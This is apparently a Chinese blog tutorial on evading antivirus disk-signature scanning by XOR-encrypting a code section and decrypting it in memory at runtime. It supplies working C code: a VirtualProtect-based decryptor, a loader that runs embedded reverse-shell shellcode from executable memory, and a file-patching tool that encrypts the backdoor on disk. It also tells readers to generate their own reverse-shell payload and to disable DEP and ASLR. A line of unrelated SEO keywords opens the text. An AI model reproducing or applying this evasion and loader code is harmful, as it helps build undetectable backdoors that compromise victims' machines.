当地信息网站建设资质,淮安市住房和城乡建设局网站首页,保山手机网站建设,网站首页如何设计动态解密执行技术可以对抗杀软的磁盘特征查杀。其原理是将程序代码段中的代码进行加密#xff0c;然后将加密后的代码回写到原始位置。当程序运行时#xff0c;将动态解密加密代码#xff0c;并将解密后的代码回写到原始位置#xff0c;从而实现内存加载。这种技术可以有效…动态解密执行技术可以对抗杀软的磁盘特征查杀。其原理是将程序代码段中的代码进行加密然后将加密后的代码回写到原始位置。当程序运行时将动态解密加密代码并将解密后的代码回写到原始位置从而实现内存加载。这种技术可以有效地规避杀软的特征码查杀因为加密后的代码通常不会被标记为恶意代码。
利用动态解密执行技术可以实现免杀。当程序中使用了敏感的函数时存在被杀的风险。通过将代码段中的代码进行加密在需要时直接在内存中解密可以避免被杀软检测到硬盘文件的特征从而规避杀软针对硬盘特征的查杀手法。
在学习本章内容之前需要先了解VirtualProtect函数该函数可以动态调整特定一段内存区域的读写执行属性该函数原型如下所示
BOOL WINAPI VirtualProtect(LPVOID lpAddress,SIZE_T dwSize,DWORD flNewProtect,PDWORD lpflOldProtect
);其中参数的含义如下
lpAddress欲更改保护属性的虚拟内存区域的起始地址。dwSize欲更改保护属性的虚拟内存区域的大小。flNewProtect新的保护属性。lpflOldProtect指向变量的指针用于存储原始保护属性。
有了此关键函数的支持那么实现动态解密执行将变得容易一般而言在设置权限之前需要通过VirtualQuery来查询一下当前权限并将查询结果保存起来该步骤主要用于在执行解密后来将内存恢复到原始位置接着通过调用VirtualProtect函数将该页的保护属性改为PAGE_READWRITE以便可以对该页进行读写操作解密函数很容易被实现。
void Decrypt(DWORD* pData, DWORD Size, DWORD value)
{// 保存查询结果MEMORY_BASIC_INFORMATION mbi_thunk;// 查询页信息VirtualQuery(pData, mbi_thunk, sizeof(MEMORY_BASIC_INFORMATION));// 改变页保护属性为读写VirtualProtect(mbi_thunk.BaseAddress, mbi_thunk.RegionSize, PAGE_READWRITE, mbi_thunk.Protect);// 计算出对数据共需要异或的次数Size Size / 0x4;// 解密begindecrypt与enddecrypt标签处的数据while (Size--){*pData (*pData) ^ value;pData;}// 恢复页的原保护属性DWORD dwOldProtect;VirtualProtect(mbi_thunk.BaseAddress, mbi_thunk.RegionSize, mbi_thunk.Protect, dwOldProtect);
}如上所示该函数接受三个参数pData 是待解密数据的指针Size 是数据块的大小以字节为单位value 是用来异或解密数据的值。
首先该函数调用了VirtualQuery函数来获取pData所在虚拟内存页的信息然后通过调用VirtualProtect函数将该页的保护属性改为PAGE_READWRITE以便可以对该页进行读写操作。接下来该函数计算需要对多少个DWORD值进行异或解密。由于每个DWORD有4个字节所以将Size除以0x4就可以得到需要异或解密的DWORD数量。
最后该函数对每个DWORD值进行异或解密操作并将解密后的值写回到内存中。解密操作使用了按位异或^运算符即将每个DWORD值中的每个字节与value中对应的字节进行异或操作。由于value是一个DWORD 值因此在对所有字节进行异或操作时value的4个字节会循环使用。最后再次调用VirtualProtect函数将该页的保护属性改回原来的状态。
主函数中首先读者需要自行生成一段32位的反弹ShellCode后门并将该区域替换至buf所处位置处并编译这段代码 小提示读者在编译时请关闭DEPASLR地址随机化等保护否则VA不固定无法确定位置。 #pragma comment(linker, /section:.data,RWE)typedef void(__stdcall *CODE) ();int main(int argc, char* argv[])
{DWORD AddressA, AddressB, Size, key;DWORD *ptr;TCHAR cCode[30] { 0 };__asm mov AddressA, offset BeginOEP__asm mov AddressB, offset EndOEPSize AddressB - AddressA;ptr (DWORD*)AddressA;// 设置加密密钥_tcscpy(cCode, Llyshark);key 1;for (unsigned int i 0; i lstrlen(cCode); i){key key * 6 cCode[i];}// 执行解密函数Decrypt(ptr, Size, key);BeginOEP:__asm inc eax // 在十六进制工具中对应0x40__asm dec eax // 在十六进制工具中对应0x48// MessageBoxA(0, hello lyshark, 0, 0);unsigned char buf[] \xba\x1a\x77\xba\x2b\xd9\xee\xd9\x74\x24\xf4\x5e\x29\xc9\xb1\x59\x31\x56\x14\x03\x56\x14\x83\xee\xfc\xf8\x82\x46\xc3\x73\x6c\xb7\x14\xeb\xe4\x52\x25\x39\x92\x17\x14\x8d\xd0\x7a\x95\x66\xb4\x6e\x94\x87\x36\x38\x9c\x51\xc2\x34\x09\xac\x14\x14\x75\xaf\xe8\x67\xaa\x0f\xd0\xa7\xbf\x4e\xdb\xac\xa6;PVOID pFunction NULL;// 分配空间pFunction VirtualAlloc(0, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);// 拷贝恶意代码memcpy(pFunction, buf, sizeof(buf));// 执行代码CODE StartShell (CODE)pFunction;StartShell();EndOEP:__asm inc eax__asm dec eaxreturn 0;
}此时我们需要将编译代码拖入到WinHex工具内然后按下CtrlAltX输入4048找到开始于结束的位置此处之所以是4048是因为我们在代码片段中布置了__asm inc eax,__asm dec eax是为了方便我们搜索时的特征值至此我们分别记录下起始地址592结束地址5F4此处的代码需要被工具异或加密。 接下来读者需要实现一个对文件进行加密的功能如下所示的PatchFile();函数读者依次传入前面生成的后门程序并分别传入WinHex中给出的起始地址及结束地址以及一个加密密钥此处需保持与上方解密密钥一致
#include Windows.h
#include tchar.h
#include iostream// 异或加密
bool PatchFile(LPCTSTR szFileName, DWORD address1, DWORD address2, LPCTSTR szRegCode)
{TCHAR szBuffer[30] { 0 };DWORD offset, Size, k, nbWritten, szTemp;;HANDLE hFile;DWORD* ptr;hFile CreateFile(szFileName,GENERIC_READ | GENERIC_WRITE,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);if (hFile INVALID_HANDLE_VALUE){return false;}// 对输入的注册码进行一定的变换得到密钥k k F注册码k 1;for (DWORD i 0; i _tcslen(szRegCode); i){k k * 6 szRegCode[i];}Size address2 - address1;// 加密时每次异或 DWORD数据Size是为最终需要异或的次数Size Size / 0x4;offset address1;for (DWORD i 0; i Size; i){SetFilePointer(hFile, offset, NULL, FILE_BEGIN);// 读取DWORD字节的文件内容ReadFile(hFile, szBuffer, 4, szTemp, NULL);ptr (DWORD*)szBuffer;*ptr (*ptr) ^ k;SetFilePointer(hFile, offset, NULL, FILE_BEGIN);// 写入文件if (!WriteFile(hFile, ptr, 4, nbWritten, NULL)){CloseHandle(hFile);return false;}offset offset 4;}CloseHandle(hFile);return true;
}int main(int argc, char* argv[])
{bool bSuccess PatchFile(d://lyshark.exe, 0x592, 0x5f4, lyshark);if (bSuccess){printf(ShellCode 已被加密替换);}system(pause);return 0;
}这段代码运行后将会通过异或运算替换lyshark.exe程序中的0x592-0x5f4之间的机器码并以lyshark为密钥依次异或替换
当程序没有运行到指定区域时区域内的数据默认处于加密状态此时的汇编指令集则处于被保护的状态 而一旦EIP指针运行到此处时则此处的代码将被解密并展开由于指令执行到此处才会被解密执行而未被执行则处于加密状态所以这将导致多数磁盘查杀无法查出特征值内存查杀也需要真正运行到此处才能确定此处代码的真正功能 本文作者 王瑞 本文链接 https://www.lyshark.com/post/a4b8c8b6.html 版权声明 本博客所有文章除特别声明外均采用 BY-NC-SA 许可协议。转载请注明出处
